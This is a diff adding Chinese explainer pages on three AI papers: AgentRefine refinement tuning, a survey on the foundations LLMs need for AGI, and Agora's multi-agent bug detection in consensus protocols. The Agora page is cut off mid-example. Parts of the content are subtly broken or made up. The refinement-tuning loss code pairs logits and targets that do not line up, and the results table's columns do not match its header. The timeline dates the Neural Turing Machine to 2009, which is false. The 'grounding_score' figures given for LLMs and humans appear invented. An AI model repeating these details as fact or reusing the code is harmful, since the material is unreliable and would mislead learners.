LLM(GPT-4o)被用来模拟多轮交互。每一轮分为两个角色: + +- **DM(场景管理员)**:提供观察结果、判断动作是否有错 +- **Player(玩家)**:思考并采取行动 + +关键设计:生成的轨迹中**必须包含至少两次错误和修正的过程**。如果生成的轨迹太顺利(错误少于两次),就会被丢弃重做。 + +#### 第三步:验证与过滤 + +验证器检查: +- 动作格式是否正确 +- 任务是否最终完成 +- 错误-修正的轮次是否充足 + +## 四、代码示例 + +### 示例 1:修正微调的数据格式 + +修正微调将每条交互轨迹转换为以下用户-助手对话格式: + +```python +# 修正微调数据示例 - 一条完整的"犯错-修正"轨迹 +refinement_data = [ + # 第一轮:玩家犯错 + { + "user": "Observation: You are in a room. There is a table with a key on it. Goal: Take the key and open the door.", + "assistant": "Thought: I need to first pick up the key from the table.\nAction: take key from table" + }, + # 第二轮:DM 指出错误,玩家修正 + { + "user": "Observation: Error: You cannot take the key because the door is locked and the key is inside.\nParameter error: true", + "assistant": "Thought: Ah, I see. The key is locked inside the room. I should first look for another way to access it, or check if there's a different key.\nAction: examine table" + }, + # 第三轮:玩家继续修正,走向正确方向 + { + "user": "Observation: You examine the table. Under the table, you find a hidden compartment containing a small note.", + "assistant": "Thought: There's a hidden compartment under the table. Let me read the note for clues.\nAction: read note" + } +] +``` + +这里的关键是:**第二个助手的回复(Thought + Action)是基于 DM 指出的错误进行修正的**。模型需要学会"根据反馈调整行为"这个模式,而不是记住特定的动作序列。 + +### 示例 2:修正微调的 Loss 计算 + +传统微调对所有 token 都计算 loss,但修正微调**只修正确正确的步骤计算 loss**,跳过错误的步骤: + +```python +import torch +import torch.nn.functional as F + +def refinement_tuning_loss(model, trajectory, is_correct_fn): + """ + 修正微调的 Loss 计算方式。 + + 参数: + model: 被训练的 LLM 模型 + trajectory: 完整交互轨迹 [turn_0, turn_1, ..., turn_N] + is_correct_fn: 判断每一步是否正确 (返回 1 表示正确,0 表示错误) + + 核心思想: + 只在正确的步骤上计算 loss,跳过错误的步骤。 + 这样模型不会从错误的数据中学习,而是学习"修正后的正确行为"。 + """ + total_loss = 0.0 + correct_count = 0 + + for i, turn in enumerate(trajectory): + thought = turn["Thought"] + action = turn["Action"] + observation = turn.get("Observation", "") + + # 构建模型输入 + # 历史上下文 + 当前步骤的思考 + 动作 + context = build_context(trajectory[:i]) + input_text = f"{context}\nThought: {thought}\nAction: {action}" + target_text = f"Thought: {thought}\nAction: {action}" + + # 判断当前步骤是否正确 + is_correct = is_correct_fn(turn) # 1 if correct, 0 if error + + # 编码输入和目标 + inputs = tokenizer(input_text, return_tensors="pt") + targets = tokenizer(target_text, return_tensors="pt") + + # 只有在正确步骤上才计算 loss + if is_correct: + outputs = model(**inputs) + logits = outputs.logits + + # 提取 target 部分的 log probability + loss = F.cross_entropy( + logits[:, :-1, :], # 去掉最后一个 token + targets.input_ids[:, 1:], # 去掉第一个 token + ignore_index=tokenizer.pad_token_id + ) + total_loss += loss + correct_count += 1 + else: + # 错误步骤不计算 loss,模型不需要学习错误模式 + # 但模型会"看到"这个错误步骤作为上下文 + pass + + # 平均所有正确步骤的 loss + avg_loss = total_loss / max(correct_count, 1) + return avg_loss + + +# 使用示例 +# 假设我们有一条包含错误和修正的轨迹 +trajectory = [ + {"Thought": "I should go to the kitchen.", + "Action": "go to kitchen", + "Observation": "You enter the kitchen.", "Correct": True}, + {"Thought": "I should open the cabinet.", + "Action": "open cabinet", + "Observation": "Error: The cabinet is locked.", "Correct": False}, + {"Thought": "The cabinet is locked. I need to find a key first.", + "Action": "search counter", + "Observation": "You find a key on the counter.", "Correct": True}, + {"Thought": "Now I can use the key to open the cabinet.", + "Action": "use key on cabinet", + "Observation": "The cabinet opens. Inside is a recipe.", "Correct": True}, +] + +# 构建判断函数 +def is_correct(turn): + return 1 if turn["Correct"] else 0 + +# 计算 loss(只有正确步骤会贡献 loss) +loss = refinement_tuning_loss(model, trajectory, is_correct) +loss.backward() +optimizer.step() + +print(f"总步骤数: {len(trajectory)}, 正确步骤数: {sum(1 for t in trajectory if t['Correct'])}") +# 输出: 总步骤数: 4, 正确步骤数: 3 +``` + +这个 loss 设计的精妙之处在于: +- **模型不会从错误中学习**(错误步骤的 loss 被 mask 掉) +- **但模型会"看到"错误作为上下文**,从而学会"当上下文显示我之前犯了错时,我应该这样修正" +- 这是一种**间接学习**:模型不是记住"犯错→X",而是学会"当我看到错误反馈时→修正为Y" + +### 示例 3:推理阶段的对比 + +```python +# 传统微调的模型在遇到新环境时的表现 +def traditional_model_react(observation, history): + """传统模型:基于记忆做出反应""" + thought = model.generate_thought(observation, history) + action = model.generate_action(observation, history, thought) + # 问题:如果之前没见过这个环境,模型可能重复犯错 + # 例如:DM 指出错误后,下一轮仍然犯同样的错误 + return thought, action + + +# AgentRefine 训练后的模型在遇到新环境时的表现 +def agentrefine_model_react(observation, history): + """AgentRefine 模型:学会从错误中修正""" + thought = model.generate_thought(observation, history) + action = model.generate_action(observation, history, thought) + + # 关键区别:模型能识别之前的错误并修正 + # 例如:当观察到 "Error: Invalid command" 时, + # 模型不会重复同样的动作,而是尝试不同的格式 + return thought, action + + +# 对比:同一个错误场景下的不同反应 +scenario = { + "observation": "Error: Action 'open cabinet' failed. The cabinet is locked.", + "history": [ + {"thought": "I'll open the cabinet.", "action": "open cabinet"}, + ] +} + +# 传统模型(可能): +# Thought: The cabinet is locked. I need a key. +# Action: open cabinet # 仍然尝试 open cabinet,没有真正改变策略! + +# AgentRefine 模型(更可能): +# Thought: The cabinet is locked, so I need to find a key first. +# Action: search room # 学会了调整策略,去寻找钥匙 +``` + +## 五、实验结果 + +### 5.1 在五个任务上的表现 + +研究团队在五个智能体评估任务上进行了测试: + +| 方法 | AlfWorld | BabyAI | SciWorld | PDDL | Jericho | +|------|----------|--------|----------|------|---------| +| | 成功率 | 进度 | 成功率 | 进度 | 成功率 | 进度 | 成功率 | 进度 | 成功率 | 进度 | +| GPT-4o | 66.4 | 79.9 | 48.2 | 64.1 | 40.0 | 76.9 | 61.7 | 69.8 | 10.0 | 34.0 | +| Agent-FLAN | **67.2** | **79.7** | 25.0 | 35.3 | 1.1 | 10.9 | 8.3 | 25.5 | 0.0 | 10.1 | +| **AgentRefine** | 44.8 | 63.8 | **37.5** | **50.4** | **14.4** | **42.6** | **16.6** | **37.8** | **10.0** | **32.3** | + +**关键发现**: +- 在 held-out 任务(BabyAI、SciWorld、PDDL、Jericho)上,AgentRefine 显著超越 Agent-FLAN +- 在 SciWorld 上,成功率从 1.1% 提升到 37.5%(提升超过 34 个百分点) +- 在 Jericho 上,成功率从 0% 提升到 10% + +### 5.2 消融实验 + +| 模型变体 | SciWorld 成功率下降 | +|----------|-------------------| +| 完整 AgentRefine | - | +| 去掉修正数据(w/o refinement) | 大幅降低 | +| 去掉验证器(w/o verification) | 大幅降低 | +| 只用一半训练数据 | 大幅降低 | + +这说明修正数据、验证器、数据多样性都是不可或缺的组件。 + +## 六、关键启示 + +### 6.1 泛化与自我修正正相关 + +研究最重要的发现是: + +> **智能体的泛化能力与其自我修正能力密切相关。** + +不是训练数据越多越好,而是训练数据中"犯错-修正"的比例和质量决定了模型的泛化能力。 + +### 6.2 不要只记忆,要学"怎么学" + +传统微调让模型记住"在 A 环境下做 B 动作",但换到 C 环境就失效了。修正微调让模型学会"当我看到结果与预期不符时,我应该检查什么、调整什么"——这是一个通用能力。 + +### 6.3 对环境扰动的鲁棒性 + +修正微调的模型在面对环境描述的细微变化时(如将 "clean obj with recept" 改为 "clean obj using recept"),表现比传统微调更稳定,标准差更小。 + +## 七、总结 + +AgentRefine 的核心贡献可以浓缩为一句话: + +> **与其让模型记住一千道题的答案,不如教它从错误中学习的方法。** + +方法简洁但有效: +1. 生成包含"错误-修正"过程的训练数据 +2. 训练时只在正确步骤上计算 loss +3. 模型学会通过观察反馈来修正自己的行为 + +这种方法在多个不同任务上展现了显著的泛化优势,甚至在某些任务上接近了 GPT-4o 的水准。 + +## 参考资料 + +- 论文: [AgentRefine: Enhancing Agent Generalization through Refinement Tuning](https://arxiv.org/abs/2501.01702) +- 项目页面: https://agentrefine.github.io/ +- 发表: ICLR 2025 +- 作者: Dayuan Fu, Keqing He, Yejie Wang 等(北京邮电大学、美团) diff --git a/src/content/docs/papers/agi-survey.md b/src/content/docs/papers/agi-survey.md new file mode 100644 index 000000000..8f51b4013 --- /dev/null +++ b/src/content/docs/papers/agi-survey.md @@ -0,0 +1,347 @@ +--- +title: Large language models for artificial general intelligence (AGI): A survey +来源: 'https://arxiv.org/abs/2501.03151' +日期: 2026-06-13 +分类: 其他 +子分类: AGI +provenance: pipeline-v3 +--- + +## 是什么 + +这篇论文是一篇**综述**——它回答一个根本问题:当前的大语言模型(LLM)缺了哪些"地基",才能变成真正通用的人工智能(AGI)? + +日常类比:现在的 LLM 像一个读了全世界图书馆的书、能背下每句话的学生,但当你让他去厨房倒杯水——他不知道"杯"是什么触感,不知道"水"会流,不知道"倒"需要手腕发力。论文说,这就是因为他缺少四个地基:**具身(embodiment)、符号接地(symbol grounding)、因果(causality)、记忆(memory)**。把这四个建好,LLM 才可能从"嘴强王者"变成"真正的智能体"。 + +论文不提出某个新算法,而是**系统性梳理**这四个概念的定义、在生物学中的角色、在 AI 中的已有实现方法,以及它们如何相互协作形成一个完整的 AGI 认知架构。 + +## 为什么重要 + +不理解这篇论文,下面这些趋势都找不到共同主线: + +- 为什么 2024-2025 年 VLA(视觉-语言-动作)模型突然火了?——这是具身化的实践 +- 为什么 RAG(检索增强生成)被广泛采用?——这是"记忆"原则的工程化 +- 为什么"符号 grounding"这个 1990 年代的老话题又回潮了?——因为纯数据驱动的 LLM 碰到了语义天花板 +- 为什么因果推理成为 LLM 研究的新热点?——因为相关性 ≠ 因果性,LLM 在 OOD 场景下频繁翻车 + +## 核心概念 + +### 一、具身化(Embodiment) + +**概念**:智能不能脱离身体和环境独立存在。就像你没法通过读《游泳教程》学会游泳——你必须下水,感受水的浮力,调整身体姿态。人的大脑、身体、环境是一个统一系统,三者共同塑造智能。 + +**为什么 LLM 缺这个**:LLM 没有身体,没有传感器,没有物理动作能力。它看到十亿句"杯子是硬的",但它从不知道"硬"的真实触感。这种缺失导致 LLM 的物理直觉(intuitive physics)几乎为零。 + +**已有实现路径**: + +1. **VLA 模型**(如 RT-1 / RT-2):把语言模型输出直接映射为机器人动作 +2. **模拟环境交互**:在 Minecraft / SIMPA 等虚拟世界中让 agent 通过语言指令行动并接收反馈 +3. **多模态融合**:视觉 + 语言联合训练,让模型学会将视觉感知与语言表征对齐 + +```python +# 类比:具身化在 VLA 中的体现 +# 当前 LLM 输出文本,VLA 把文本映射到关节空间 +import torch + +class VLA_ConditionalPolicy: + """简化的 VLA 策略网络:语言条件 → 机器人动作""" + + def __init__(self, lang_dim=4096, action_dim=7): + # lang_encoder: 把"拿起桌上的红色杯子"变成向量 + self.lang_encoder = TransformerEncoder(lang_dim) + # vision_encoder: 把场景图像变成向量 + self.vision_encoder = CNNVisionEncoder(lang_dim) + # 动作解码器 + self.action_decoder = MLP(lang_dim * 2, action_dim) + + def forward(self, instruction, observation): + # 具身化的核心:语言 + 视觉感知联合决定动作 + lang_vec = self.lang_encoder(instruction) + vis_vec = self.vision_encoder(observation) + combined = torch.cat([lang_vec, vis_vec], dim=-1) + action = self.action_decoder(combined) # [7] = (x, y, z, roll, pitch, yaw, gripper) + return action + +# 没有具身化的 LLM 对比:同样的指令只生成文本描述 +# "他伸手拿起杯子" —— 没有动作向量,没有物理反馈 +``` + +### 二、符号接地(Symbol Grounding) + +**概念**:词"苹果"对你意味着什么?如果你只知道"苹果是一种水果,红色的,甜的"——这些定义本身也是用词组成的。你从未真正"接地"过"苹果"这个符号。人类的符号接地来自**直接感知经验**:你尝过苹果的味道,看过它的形状,摸过它的表皮。 + +**核心问题**:Harnad 在 1990 年提出的"符号接地问题"——如果 AI 系统中的所有符号都只通过其他符号定义,那整个系统就像一本字典:每个词的解释都引用另一个词,永远到不了真实世界。 + +**LLM 的本质困境**:LLM 本质上就是一本超级字典。它的"知识"全部来自词与词之间的统计共现,没有物理世界的直接接地。 + +**已有实现路径**: + +1. **知识图谱接地**:把 LLM 的输出映射到结构化知识图谱(如 Wikidata),让符号指向真实实体 +2. **本体驱动提示**:用本体(ontology)约束 prompt,让模型输出对齐到预定义的概念框架 +3. **端到端 embedding 接地**:在训练中将文本 embedding 与图像/语音/力觉等多模态向量联合优化 +4. **主动探索交互**:让 agent 在环境中主动探索,建立"动作-感知"闭环 + +```python +# 符号接地的两种实现思路对比 + +# 方法 1:知识图谱接地 —— 让符号指向结构化实体 +class KG_GroundedLLM: + """通过知识图谱给 LLM 的文本输出"接地"到真实实体""" + + def __init__(self, kg_client): + self.kg = kg_client # 如 Wikidata / DBpedia + + def ground(self, text): + # 从文本中提取实体,并在 KG 中找到对应节点 + entities = self.extract_entities(text) + grounded = {} + for ent in entities: + # 接地结果:符号 → 真实世界的结构化描述 + grounded[ent] = self.kg.lookup(ent) + # 例: "苹果" → { + # "wikidata_id": "Q893", + # "instance_of": "fruit", + # "color": ["red", "green"], + # "taste": "sweet", + # "edible": true, + # "nutritional_info": {...} + # } + return grounded + + def extract_entities(self, text): + # 简化的实体抽取,实际可用 spaCy / Stanford NER + return text.split() + + +# 方法 2:端到端多模态接地 —— 文本 embedding 与视觉 embedding 对齐 +class Multimodal_GroundedLLM: + """用 CLIP 式的对比学习让文本和视觉共享同一 embedding 空间""" + + def __init__(self, text_encoder, image_encoder): + self.text_enc = text_encoder + self.img_enc = image_encoder + + def ground(self, text, image): + # 文本和图像映射到同一空间,相似度 = 接地程度 + text_emb = self.text_enc(text) # [512] + img_emb = self.img_enc(image) # [512] + similarity = torch.cosine_similarity(text_emb, img_emb) + # similarity 高 → 文本描述与图像内容"接地"一致 + return { + "text_embedding": text_emb, + "image_embedding": img_emb, + "grounding_score": similarity.item() + } + +# 当前 LLM 的 grounding_score ≈ 0.7-0.85(基于多模态 benchmark) +# 人类对同一词语的 grounding_score ≈ 0.99(因为直接感知经验) +``` + +### 三、因果推理(Causality) + +**概念**:相关性是"两个东西一起出现",因果性是"一个东西导致了另一个东西"。LLM 本质上是统计相关性机器——它见过"打雷→下雨"被一起描述了一百万次,但它不知道"打雷导致下雨"。当遇到"打雷→不下雨"的情况,LLM 可能依然给出与训练数据一致的错误推断。 + +**Pearl 的因果阶梯**: + +1. **关联(Association)**:看到 X,预测 Y(LLM 目前最高只到这一层) +2. **干预(Intervention)**:如果我做 A,会发生什么?("如果我往墙上扔石头,墙会碎吗?") +3. **反事实(Counterfactual)**:如果当时我做了 A,结果会不会不同?("如果我刚才没踩香蕉皮,我会摔跤吗?") + +**已有实现路径**: + +1. **深度学习方法**:在损失函数中加入因果约束(如 do-calculus) +2. **神经符号方法**:把 LLM 的输出接入符号推理引擎(如逻辑推理器)做因果校验 +3. **物理 informed world model**:用物理规律作为归纳偏置,约束模型的推理空间 + +```python +# 因果推理示例:LLM 的局限 vs 因果模型的改进 + +# 场景:观测数据 "冰淇淋销量 ↑ → 溺水事故 ↑" +# LLM 基于统计相关性:可能推断"吃冰淇淋导致溺水" +# 因果模型识别:两者都由第三个变量"夏季高温"引起(混杂因子 confounder) + +import numpy as np + +class CausalReasoner: + """简化的因果推理框架""" + + def __init__(self): + # 因果图:ice_cream ← summer_heat → drownings + # 如果不控制混杂因子 heat,相关性 ≠ 因果性 + pass + + def observational_inference(self): + """LLM 式的相关性推理——只看数据分布""" + # P(drowning | ice_cream_high) ≈ 高(因为数据中两者共现) + return { + "method": "observational", + "prediction": "high_drowning_risk", + "flaw": "confounded_by_summer_heat" + } + + def interventional_inference(self, do_action="reduce_ice_cream"): + """do-calculus 干预推理——主动改变变量""" + # P(drowning | do(ice_cream=low)) = P(drowning | heat=high) ≈ 仍高 + # 因为真正导致溺水的是 heat,不是 ice_cream + return { + "method": "interventional", + "prediction": "drowning_risk_unchanged", + "explanation": "ice_cream is a spurious correlation,\n" + "not a causal factor. Reducing ice_cream\n" + "does not change drowning probability." + } + + def counterfactual_inference(self, observed="fell_on_banana_skin"): + """反事实推理——"如果当时没做 X 会怎样"""" + return { + "method": "counterfactual", + "question": "If he hadn't stepped on the banana peel, would he have fallen?", + "answer": "No — the banana peel was the cause.\n" + "Counterfactual world: clean floor → no fall." + } + +# 对比输出: +# LLM(相关性): "吃冰淇淋的人更容易溺水,应该禁止冰淇淋销售" +# 因果推理: "冰淇淋和溺水的关联是夏季高温导致的虚假相关" +``` + +### 四、记忆(Memory) + +**概念**:人的记忆分三层(和认知科学一致): + +1. **感觉记忆(Sensory)**:持续 < 1 秒。你眨眼时视网膜上残留的画面——LLM 的"attention window"就是这种机制的数字化 +2. **工作记忆(Working)**:持续秒到分钟。你心算 17 × 23 时暂存在脑子里的数字 +3. **长期记忆(Long-term)**:持续终生。你的童年、专业技能、人生经历 + +LLM 的记忆问题:它的"长期记忆"就是训练参数——**固化且不可变**。你不能在对话中"学会新东西"然后永远记住它。RAG 是外部记忆的一种折中方案,但它不等于真正的记忆。 + +**已有实现路径**: + +1. **参数化记忆**:通过持续预训练 / 微调让知识融入模型权重(但有灾难性遗忘问题) +2. **注意力机制**:Transformer 的 self-attention 本身就是工作记忆的近似 +3. **显式记忆模块**:在模型架构中加入可读写的外部记忆存储(如 Neural Turing Machine) +4. **RAG 外部记忆**:检索 + 生成,工程上最成熟但缺乏真正的"回忆"能力 + +```python +# LLM 记忆架构对比:从单一窗口到分层记忆 + +class HierarchicalMemory: + """分层记忆架构:感觉记忆 + 工作记忆 + 长期记忆""" + + def __init__(self, model, vector_db, episodic_buffer): + self.model = model + self.vector_db = vector_db # 长期记忆:向量数据库(RAG 后端) + self.episodic_buffer = episodic_buffer # 工作记忆:对话轮次缓冲区 + + def sensory_memory(self, raw_input): + """感觉记忆:raw input → token embedding(瞬时,≈ attention window)""" + return self.model.tokenizer.encode(raw_input) + + def working_memory(self, conversation_history): + """工作记忆:维护当前对话的上下文""" + self.episodic_buffer.append(conversation_history[-1]) + # 限制大小,超出则压缩摘要 + if len(self.episodic_buffer) > 20: + self.episodic_buffer = self._summarize(self.episodic_buffer[:-5]) + return self.episodic_buffer + + def long_term_memory(self, query): + """长期记忆:语义检索 + 生成""" + # 1. 在向量库中检索最相关的知识片段 + relevant_docs = self.vector_db.similarity_search(query, top_k=5) + # 2. 把检索结果注入 prompt 让模型生成 + augmented_prompt = self._build_prompt(query, relevant_docs) + response = self.model.generate(augmented_prompt) + # 3. (可选)把新学到的知识写回长期记忆 + self.vector_db.add(key=query, value=response) + return response + + def learn(self, experience): + """真正的"学习":把重要经验固化到长期记忆""" + # 简化:提取 key facts 存入向量库 + facts = self._extract_facts(experience) + self.vector_db.add_batch(facts) + # 注意:参数化记忆需要 finetune,成本很高 + # 所以工程上优先用 RAG 而非持续训练 + return facts + + def _summarize(self, history): + # 用模型自身做对话压缩 + summary_prompt = f"Summarize the following conversation:\n{''.join(history)}" + return [self.model.generate(summary_prompt)] + + +# RAG 的局限性: +# RAG = 查字典,不是真正"记住" +# 查字典快但浅,记忆慢但深 +# AGI 需要两者的有机组合 +``` + +## 四大原则的协作关系 + +论文的核心贡献之一是提出这四个原则**不是孤立的**,而是相互依存形成一个完整认知循环: + +``` +环境感知 → 具身化(通过身体感知世界) + ↓ +符号接地(把感知到的东西命名、分类、关联) + ↓ +因果推理(理解"为什么"和"如果...会怎样") + ↓ +记忆(把经验存入,供未来调用) + ↓ +回到环境感知(用记忆指导下一次感知和行动) +``` + +**具身化是入口**——没有身体感知,符号就是无源之水。 +**符号接地是桥梁**——把感官信号变成可操作的抽象概念。 +**因果推理是引擎**——让系统不只是模式匹配,而是理解规律。 +**记忆是积累器**——让每一次经验都不白费,持续增长能力。 + +## 踩过的坑 + +1. **LLM 的"幻觉"本质是 grounding 缺失**:模型在统计模式上给出合理但不真实的回答——因为它不知道"真实"是什么触感 +2. **RAG 不是真正的记忆**:它是外部检索,模型本身没有"记住"任何东西;检索失败 = 知识丢失 +3. **因果推理在 LLM 中极难**:因为 LLM 的训练目标是 next-token prediction(相关性最大化),与因果推断的目标函数根本不同 +4. **具身化的数据瓶颈**:VLA 模型受限于真实的机器人交互数据,远少于文本数据——这是当前最大的工程障碍 + +## 适用 vs 不适用场景 + +这篇综述本身是理论性的,它指导的方向适用于: + +适用: +- 开发真正的自主 agent(不是简单聊天机器人) +- 构建机器人 + 语言的联合系统 +- 需要 OOD 泛化能力的场景 +- 医疗 / 法律等需要因果推理的高可靠领域 + +不适用: +- 纯文本生成任务(翻译、摘要、创作)——当前 LLM 已经够用 +- 快速原型 / MVP 开发——四大原则的工程化成本高 +- 资源极度受限的场景 + +## 学到什么 + +- LLM ≠ AGI:LLM 是通往 AGI 的路径之一,但不是终点 +- 四大原则(具身、接地、因果、记忆)是论文提炼的 AGI 地基,每一条都有丰富的已有工作可以跟进 +- 类比很重要:把生物学认知原理映射到 AI 架构时,类比是理解的第一步——但不要止步于类比,要看具体实现技术 +- 当前的工程实践(RAG、VLA、multi-modal)已经是四大原则的"初代实现",但它们还很粗糙 +- 最深刻的洞察:**相关性可以模仿智能的表象,但只有因果性才能真正产生理解** + +## 历史小故事(可跳过) + +- 1990:Harnad 提出"符号接地问题"——那时连互联网都没普及 +- 2009:Neural Turing Machine 首次提出"可读写外部记忆"——想法超前了整整十年 +- 2017:Transformer 论文诞生——但最初没人想到它能做 LLM +- 2020:GPT-3 展示零样本学习能力——全世界以为 LLM 就是 AGI +- 2022-2023:幻觉、推理失败等问题暴露——学界开始冷静反思 +- 2024:RT-2 把 Vision-Language-Action 三模态融合——具身化的重要里程碑 +- 2025:这篇综述系统梳理了四大原则,把分散的研究方向统一到 AGI 框架下 + +## 延伸阅读 + +- [[cot]] — 思维链(Chain-of-Thought),是因果推理在 LLM 中的近似实现 +- [[rag-lewis-2020]] — RAG 原始论文,"记忆"原则的工程化先驱 +- [[deepseek-r1]] — DeepSeek-R1,用纯 RL 训练推理能力,与因果推理方向互补 +- [[self-rag-2023]] — Self-RAG,让模型自己判断检索结果是否可靠——接地的一种软方式 +- [[grounded-videollm-2024]] — Grounded VideoLLM,视觉 grounding 的实例 diff --git a/src/content/docs/papers/agora-autonomous-bug-detection-in-consensus-protocols-with-llm-agents-arxiv-2605.md b/src/content/docs/papers/agora-autonomous-bug-detection-in-consensus-protocols-with-llm-agents-arxiv-2605.md new file mode 100644 index 000000000..afe83d867 --- /dev/null +++ b/src/content/docs/papers/agora-autonomous-bug-detection-in-consensus-protocols-with-llm-agents-arxiv-2605.md @@ -0,0 +1,308 @@ +--- +title: Agora — 用 LLM Agent 自主检测共识协议的 Bug +来源: 'https://arxiv.org/abs/2605.29910' +日期: 2026-06-13 +分类: 分布式系统 +子分类: 共识与复制 +provenance: pipeline-v3 +--- + +## 是什么 + +Agora 是一个**用多个 LLM Agent 自动发现分布式共识协议里深层逻辑 Bug 的系统**。 + +日常类比:想象你是一家工厂的安全质检员。普通的代码审查工具像一个走马灯——只能看到"这个螺丝拧歪了"(内存泄漏、空指针)。但 Agora 派了三个质检员:一个总指挥(Orchestrator)、一个场景设计师(Strategy)、一个测试工程师(TestGen)。总指挥说:"上次发现停机后再启动会导致数据不一致,这次试试两台同时停机呢?"场景设计师根据共识协议的特性设计出一个"三台节点互相干扰"的复杂场景。测试工程师写代码让这个场景跑起来——如果系统出了错,就找到了一个连资深工程师都可能忽略的深层逻辑 Bug。 + +## 为什么重要 + +共识协议是分布式系统的**心脏起搏器**——Raft 被 etcd、K8s 用;Paxos 变种被 Google Spanner 用;HotStuff 被区块链系统用。它们的目标是让一群机器对"当前状态是什么"达成一致。 + +**核心矛盾**:共识协议的正确性取决于安全性(safety)和活性(liveness)。一旦实现中出现违反安全性的 Bug——比如两台机器同时宣称自己"赢了投票"——后果不是程序崩溃,而是**数据静默损坏**。在金融和区块链场景里,这意味着真金白银的损失。 + +现有的 LLM 做代码分析时,只能找到实现级别的 Bug(越界访问、空指针)。但共识协议的真正危险在于**协议级别的逻辑 Bug**——多个执行阶段之间的状态依赖出了问题。Agora 是第一个把"共识协议的领域知识"和"多 Agent 协作"结合起来的系统。 + +## 核心概念 + +### 1. 假设驱动测试(Hypothesis-Driven Testing, HDT) + +传统测试回答:"这个功能正常工作吗?" +HDT 回答:**在什么条件下,这个功能会失败?** + +一个漏洞假设用四个部分组成: + +| 符号 | 含义 | 类比 | +|------|------|------| +| C | 前置条件 | 需要满足什么前提 | +| A | 动作序列 | 做什么操作 | +| E | 期望的 Bug 行为 | 希望观察到什么异常 | +| O | 验证断言 | 用什么来确认 Bug 存在 | + +### 2. 两类 Bug:实现级 vs 协议级 + +``` +实现级 Bug(浅层):内存越界、整数溢出、空指针 + → 程序崩溃,但不影响数据一致性 + +协议级 Bug(深层):安全属性被违反 + → 两台机器对"谁赢了投票"有不同答案 + → 数据静默损坏,系统"看似正常运行" +``` + +### 3. 五大协议级 Bug 模式 + +1. **Recovery & Execution Divergence**:节点重启后执行路径和之前不同 +2. **Persistence & Monotonicity Violation**:持久化数据不单调 +3. **Dependency & Topology Flaw**:消息依赖关系出错 +4. **Message Binding & Signature Violation**:消息签名绑定不对 +5. **Resource & Operational Visibility Violation**:资源可见性不一致 + +### 4. CFT vs BFT + +- **CFT**(Crash Fault-Tolerant):节点只会"挂掉",不会"作恶"。比如 Raft、EPaxos。 +- **BFT**(Byzantine Fault-Tolerant):节点可能"作恶"(发送虚假信息)。比如 HotStuff、BullShark。 +- Agora 的亮点:**同一套框架同时支持两种类型**,因为它们对 Bug 的约束条件完全不同。在 CFT 里假设节点作恶是没有意义的,会浪费计算资源。 + +## Agora 的架构 + +Agora 由三个 Agent 组成,每个 Agent 有明确分工: + +``` +┌─────────────────────────────────────────────────┐ +│ Agora 系统 │ +│ │ +│ ┌─────────────┐ ┌─────────────┐ │ +│ │ Orchestrator │───▶│ Strategy │ │ +│ │ (总指挥) │◀───│ (场景设计师) │ │ +│ └──────┬──────┘ └──────┬──────┘ │ +│ │ │ │ +│ ▼ ▼ │ +│ ┌──────────────────────────────────┐ │ +│ │ TestGen (测试工程师) │ │ +│ │ 写测试 → 执行 → 分析 → 反思 │ │ +│ └──────────────────────────────────┘ │ +│ │ +│ 知识库:Bug 模式 + 协议约束条件 │ +└─────────────────────────────────────────────────┘ +``` + +**总指挥(Orchestrator)**:管流程、管记忆。它做了两件事: +- 回顾之前发现的 Bug,指导下一个搜索方向 +- 维护全局状态,防止重复搜索同一类场景 + +**场景设计师(Strategy)**:懂协议特性。它分析了: +- 当前协议的约束条件(CFT 还是 BFT) +- 已有的 Bug 模式 +- 然后生成具体的攻击场景(比如"节点在投票中途崩溃") + +**测试工程师(TestGen)**:写测试代码来验证攻击场景。它有一个**反思循环**: +- 生成测试 → 执行测试 → 分析结果 → 如果失败就改写测试,直到成功或达到最大重试次数 + +## 工作流程 + +整个流程遵循 12 步循环: + +``` +Orchestrator: + Step 1 - 分析历史 Bug,确定搜索方向 + Step 2 - 分析全局状态,避免重复 + Step 3 - 把分析结果发给 Strategy + +Strategy: + Step 4 - 分析协议约束条件 + Step 5 - 结合历史 Bug 和全局状态 + Step 6 - 生成攻击场景(控制节点行为:加入、离线、崩溃、消息乱序) + Step 7 - 把攻击场景发给 Orchestrator + +TestGen: + Step 9 - 根据攻击场景生成单元测试 + Step 10 - 执行测试 + Step 11 - 分析结果(成功=发现 Bug → 进入 12;失败→回到 9 重写测试) + Step 12 - 把发现的 Bug 报告给 Orchestrator +``` + +### 代码示例 1:Agora 的伪代码工作流 + +```python +# Agora 主循环 —— 算法 1 +def agora_workflow( + knowledge_repo: KnowledgeBase, # 共识协议代码库 + bug_patterns: set[BugPattern], # 已知 Bug 模式 + constraints: ProtocolConstraints # CFT/BFT 约束条件 +) -> set[Bug]: + global_state = {} # 全局状态记忆 + + while 还有探索预算: + # ── Orchestrator Agent ── + historical_bugs = bug_exploitation(global_state) # 回顾历史 + state_summary = state_analyzer(global_state) # 分析全局状态 + + # ── Strategy Agent ── + attack_scenario = Strategy.generate( + historical_bugs, # 之前发现的 Bug + state_summary, # 当前全局状态 + constraints, # CFT/BFT 约束 + bug_patterns, # 已知的 Bug 模式 + knowledge_repo # 代码库知识 + ) + + Orchestrator.send(global_state, attack_scenario) + + # ── TestGen Agent(带反思循环)── + for _ in range(MAX_RETRIES): + # 写测试代码 + test_code = TestGen.generate_unit_tests( + attack_scenario, + knowledge_repo + ) + + # 执行测试 + result = execute_and_analyze(test_code) + + if result.success: + # 找到了 Bug! + Orchestrator.report(result) + break + + # 失败了?反思并改写测试 + if _ == MAX_RETRIES - 1: + # 这个攻击场景无效,让 Strategy 生成新的 + break + + return global_state.detected_bugs +``` + +### 代码示例 2:一个具体的协议级 Bug + +Agora 在 EPaxos 中发现了 9 个协议级 Bug。下面是一个简化版的概念说明——展示什么是"协议级逻辑 Bug": + +```rust +// 这是一个简化版的共识协议状态机伪代码 +// 展示"Recovery & Execution Divergence"类型的 Bug + +struct ProposalStateMachine { + current_view: u64, // 当前视图号 + proposed_value: Option>, // 提议的值 + committed: bool, // 是否已提交 +} + +impl ProposalStateMachine { + // ── 正常流程:节点 A 收到提议 ── + fn on_propose(&mut self, value: Vec) { + self.proposed_value = Some(value.clone()); + // 发送提议给其他节点,等待投票 + broadcast(&self.encode_proposal(&value)); + } + + // ── Bug 场景:节点在投票完成后、持久化之前崩溃重启 ── + // 这就是 "Recovery & Execution Divergence" + + // 节点 A 的视角: + // 1. 收到多数派投票(quorum),认为提议已通过 + // 2. 但还没来得及把"已提交"写入磁盘就崩溃了 + // 3. 重启后,磁盘上没有"已提交"的记录 + // 4. 另一个节点 B 也收到了相同的投票,也认为已提交 + // 5. 但 A 和 B 